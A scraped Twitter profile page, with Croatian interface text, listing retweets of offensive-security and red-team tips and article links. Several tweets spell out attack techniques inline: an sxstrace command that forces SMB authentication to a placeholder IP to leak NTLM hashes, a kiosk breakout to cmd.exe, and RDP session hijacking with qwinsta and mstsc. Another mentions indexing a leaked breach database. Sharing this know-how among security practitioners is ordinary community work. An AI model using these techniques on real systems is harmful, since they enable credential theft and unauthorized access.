Tweetovi
- Tweetovi, trenutna stranica.
- Tweetovi i odgovori
- Medijski sadržaj
Blokirali ste korisnika/cu @bik3te
Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @bik3te
-
bik3te proslijedio/la je Tweet
As promised, here is the follow up defensive blog to last weeks post on Attacking Azure.https://posts.specterops.io/detecting-attacks-within-azure-bdc40f8c0766 …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
bik3te proslijedio/la je Tweet
Introduction to mobile network intrusion from a mobile phone: https://medium.com/mobile-stacks-and-networks-security/introduction-to-mobile-network-intrusions-from-a-mobile-phone-9a8e909cc276 … by
@Gallium24,@BuuriMa, Henri,@tmakkonen,@ad_ili_rai_en and myself.Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
bik3te proslijedio/la je Tweet
I made a PowerShell script when researching COM objects that has like 30 foreach and if loops and will search every COM object method for a keyword, e.g. finding COM objects with a method containing 'ExecuteShell'. Maybe someone else will find it useful.https://github.com/hausec/COMMethodSearcher …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
bik3te proslijedio/la je Tweet
I was tired of outdated XSS cheat sheets that don't touch on frameworks, html5, filter bypasses and other important stuff, so I made my own. I hope you find it as useful as I do. :) https://netsec.expert/2020/02/01/xss-in-2020.html …
#bugbountytipspic.twitter.com/Mdygq1PI9Z
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
bik3te proslijedio/la je Tweet
Getting DNS Client Cached Entries with CIM/WMIhttps://www.darkoperator.com/blog/2020/1/14/getting-dns-client-cached-entries-with-cimwmi …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
bik3te proslijedio/la je Tweet
Chapter 6 has been published!https://leanpub.com/windows10systemprogramming …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
bik3te proslijedio/la je Tweet
#PingCastle 2.8.0.0 released !!! https://pingcastle.com/download/ 4 clicks and 2 <enter>, that what's between you and the hard truth of your AD security. Example of report: https://pingcastle.com/PingCastleFiles/ad_hc_test.mysmartlogon.com.html … github: https://github.com/vletoux/pingcastle … Changelog: https://raw.githubusercontent.com/vletoux/pingcastle/2.8.0.0/changelog.txt …pic.twitter.com/1oQXuIJcdiHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
bik3te proslijedio/la je Tweet
Indexing leaked database in ElasticSearch
Small example using data from the BreachCompilation and the dashboard you can come up with in Kibana
pic.twitter.com/fICY88sK1G
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
bik3te proslijedio/la je Tweet
Very excited to announce
@_xpn_ and me will be bringing our#redteam training to Vegas this August for@BlackHatEvents https://www.blackhat.com/us-20/training/schedule/index.html#adversary-simulation-and-red-team-tactics-18511 … - we'll follow up soon with some revelations on what makes this course so exciting!Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
bik3te proslijedio/la je Tweet
Interviewé sur
@BFMTV sur le profiling génomique et le social engineering à l'occasion de ma présentation@iotcert au#FIC2020 cc@FIC_euhttps://twitter.com/Elsa_Trujillo_/status/1222214444375298051 …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
bik3te proslijedio/la je Tweet
pwndrop - The new fast & fun way to set up an HTTP/WebDAV server for your payloads is coming! python -m SimpleHTTPServer may soon be retiring. Stay tuned! Here is a quick sneak peek:pic.twitter.com/bzVV6E9oyT
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
bik3te proslijedio/la je Tweet
Windows Kiosk breakout tip: If you get a Printing panel, and the traditional methods don't work: Amongst the printers, select "SendTo OneNote" OneNote will launch -> Add new notebook On the Notebook -> New page Type: \\127.0.0.1\c$\windows\system32\cmd.exe Click the link
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
bik3te proslijedio/la je Tweet
We’re doing it again
https://twitter.com/MDSecLabs/status/1221771854509199360 …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
bik3te proslijedio/la je Tweet
Using SharpRDP for lateral movement but blocked with a medium integrity process (UAC)
?
Well ... not a problem anymore !
Just updated SharpRDP with the option 'privileged' allowing you to run a process with High integrity (if your user is local admin) !
1/3 

https://twitter.com/0xthirteen/status/1220041004167892992 …pic.twitter.com/Ll3ZhxKaza
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
bik3te proslijedio/la je Tweet
http://digital.security , est prêt pour vous accueillir au
@FIC_eu !! Rendez-vous dès demain pour pleins de cyber-surprises
#Fic2020#cybersecurite#ds2020pic.twitter.com/1cALOyvrNJ
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
bik3te proslijedio/la je Tweet
Some study notes on LSASS hooking for harvesting interactive logon credentials. https://ired.team/offensive-security/credential-access-and-credential-dumping/intercepting-logon-credentials-by-hooking-msv1_0-spacceptcredentials … Thanks to
@_xpn_ for his inspiring posts about mimikatz.Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
bik3te proslijedio/la je Tweet
If anyone is interested by an example of the Windows Next Generation Cryptography API (bcrypt.lib) - especially after CVE-2020-0601 - I wrote a simple C++ program that encrypt and decrypt a string. Link: https://github.com/am0nsec/AESCrypt …pic.twitter.com/ZFAzVIyRsE
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
bik3te proslijedio/la je Tweet
A new way to exfiltrate
#NTLM hash by forcing#SMB auth ? Check this#Microsoft#lolbin: sxstrace parse -logfile:\\192.168.XX.XX\lol.etl -outfile:a.txt || sxstrace trace -logfile:\\192.168.xx.xx\a cc@OddvarmoeHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
bik3te proslijedio/la je Tweet
It's a cool trick :)https://gist.github.com/bohops/f722f1a54d9ac1070350bdcaf2da618b …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
bik3te proslijedio/la je Tweet
Post-exploitation
#Friday tip: Do you know how to trivially & remotely hijack an#RDP session without prompt nor warning on user's side using#Microsoft signed binary (no patch/multi-session) ? qwinsta+mstsc shadowing is the answer ;) Details: https://github.com/kmkz/Pentesting/blob/master/Post-Exploitation-Cheat-Sheet …#Pentestingpic.twitter.com/wHVIYQo73A
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
Čini se da učitavanje traje već neko vrijeme.
Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.